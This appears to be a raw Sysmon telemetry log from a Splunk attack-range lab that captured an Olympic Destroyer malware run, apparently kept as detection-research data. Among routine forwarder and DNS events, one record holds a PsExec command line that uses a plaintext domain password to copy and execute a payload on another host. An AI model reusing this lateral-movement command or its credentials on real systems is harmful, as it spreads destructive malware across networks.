11:14:32.132{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297118Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:32.132{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297117Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:32.132{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297116Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:32.132{C8EA50B7-12E6-6216-4B05-000000003802}67926956C:\Temp\olympic_destroyer.exe{C8EA50B7-1718-6216-1D07-000000003802}6336C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000297115Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:32.134{C8EA50B7-1718-6216-1D07-000000003802}6336C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-15.eu-central-1.compute.internal -u "VULT.LOCAL\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000297114Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:32.132{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1718-6216-1D07-000000003802}6336C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000220975Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:33.657{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=277D900E3610D244EADBC0EE09C1E057,SHA256=46F56F90F9CFF2F1972060C0CBEAC5CC7E00E413947A730D4AB00BB4492792DB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297134Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:32.113{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local60427- 23542300x8000000000000000297133Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:33.546{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=538D18C70F04E937480F98BEC519C8F0,SHA256=F3C8FB2956C80C9FD8BD860DA0AF2B64DADB546177CA7102655EE8EC5A9AB420,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297132Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:33.147{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=E8E1F33508FF44F247ADF94ADDC24838,SHA256=473F13533DE8DD5C558429437D6152D3E19102356A6B8DCBDDCFE8B013CAB79B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297131Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:33.147{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=52540D2EC2AE883179124CDF69698864,SHA256=31F2ECEB0A3A4C765D515EC970DB72D723D1FE4AC7026FD55AEB49D1D0188B20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297130Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:33.016{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F839BA66D4EE7A06B52B6234FC5E0579,SHA256=9D32F2447FDF1405556727306E3217C32A7CC60CB4398E45EA1EA6B5AF3B38BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220974Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:33.411{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-157MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220977Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:34.703{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B357AF84824F64515DD79E62C5C37D0,SHA256=0B27411799822DA48A46C5FF900BF092D1FEC7236570BA8170C954F540E8183D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297135Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:34.046{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=806F6F31AFD8181DAE4672A89152B243,SHA256=F852A769F8A5A192E686F2A5C1483CA5A8939ECE24BF863DC3DBAABEEE080C8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220976Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:34.424{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-158MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220978Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:35.893{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98525F23AA28083CA601EAAD7BF28357,SHA256=73B8DE7B1631116A123B6415E8B615B476FA9FA46C0F61BB08AB98F08BD8DE3F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297138Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:33.636{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49420-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000297137Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:33.283{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local55894- 23542300x8000000000000000297136Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:35.061{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1ED53C1BF6E261C1E4AEADFEDF4CA34,SHA256=57DCEF010CF9A868FC32454E3714401D2BF419FBF9A775D1A4FABF66D554D880,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220979Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:36.924{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=695C74EA65E86C5C8CF1C87DC334BC3A,SHA256=DDBAA2AFE8323AC1A185CE9AA3B56F06263B0A78FD0BB2817FA9A89EA937C865,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297139Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:36.113{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5975C15755FE114679DBD1E061056899,SHA256=3672F0FD2E4982B383325C1A3C88D6194320667B34967D347841F5BC75BDF27D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297140Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:37.146{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34843536C971C81C6B03BE5DAE4A57DB,SHA256=1C1B8177872BDCDF8611E85901A5265C769F165A71C4CBD2A0D1778B13402FF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220981Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:38.158{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19B110586E0D997D816BE49CAE03CFE0,SHA256=747D3261A874F098E5816E5A618DF4584F1F28F9298C4C2CCEC1F097526822F3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220980Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:34.578{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51621-false10.0.1.12-8000- 23542300x8000000000000000297141Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:38.161{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEE3B619C63C31BDA5C3824A0B9F162F,SHA256=E0518DD1E014CF2F2CBF778B8C891941A1C6BBBF962814807FE1E83C81D3C8D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220982Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:39.190{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5A540381C56AB0FC6668A27B558ADA4,SHA256=6285B98C9BE56DDBF7E52A97F0357C8D228981ADC24FB68DE819778B93E01CE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297142Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:39.176{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA9A08D2C11833623603A4B92CE52038,SHA256=7F20D7C84E33BB70E202584A276DFC1EC1D4338CD3C2101B43D80C6FAF2D84B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220983Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:40.408{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=758D7C933FD355B437C4AA1A2EEA5830,SHA256=AE41BC5C6AFE88789D13BBCA2638E93BA33AA8E9D17099C02AF9EA2F785EEBE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297144Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:40.391{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297143Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:40.210{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5375D2954BAA7E5D0E161C3E1B30F895,SHA256=C958B57563480B4C98755BE9C805CA11D8D530F97393FB70D4747059A22E6713,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220984Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:41.424{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AE946F098B0D21FD94DEE4C2C18F7F1,SHA256=2F8E2AB7D1B9E6BD924521F9F681669169CFD53EFBFEDB86786F0C15B1898128,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297145Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:41.275{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E21291BE03FA340F4E9FBFD65B29EA13,SHA256=FC96003172851B907BEF38A3AC83C85CB5B2442C467205C89487848E66397D3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220986Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:42.596{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D699336DDC9945707D44DE40300EB48D,SHA256=BDCDB0687241C33F609C4FEFD1B3FBFFF75B648CAD93D6FC9C738ACCF0F7DC35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297148Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:42.310{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4C7FC98FF22C20F1A66901F6B421DBF,SHA256=470A30171AB45E1C3AF626B71E76F3DB5E345AE615B4ECEC361858981216F532,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220985Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:39.640{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51622-false10.0.1.12-8000- 354300x8000000000000000297147Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:39.848{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49422-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000297146Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:39.602{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49421-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000220987Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:43.611{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3ABD22A09CFB16615B18C75F0EEC8B7D,SHA256=40F95804DE97FE25D4966AF183BD4C7DCC6EC3EF8C8F740F23EDA9AFDE8E209B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297149Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:43.327{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59025FD1B7B0970DCAFB76ABF1F2B658,SHA256=2050876ACE52B159836C6C0815CF089C772D4631FB5B4C7CCE35CC8F47E149FA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221015Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.892{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1724-6216-0205-000000003902}2968C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221014Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.892{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221013Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:44.892{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221012Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 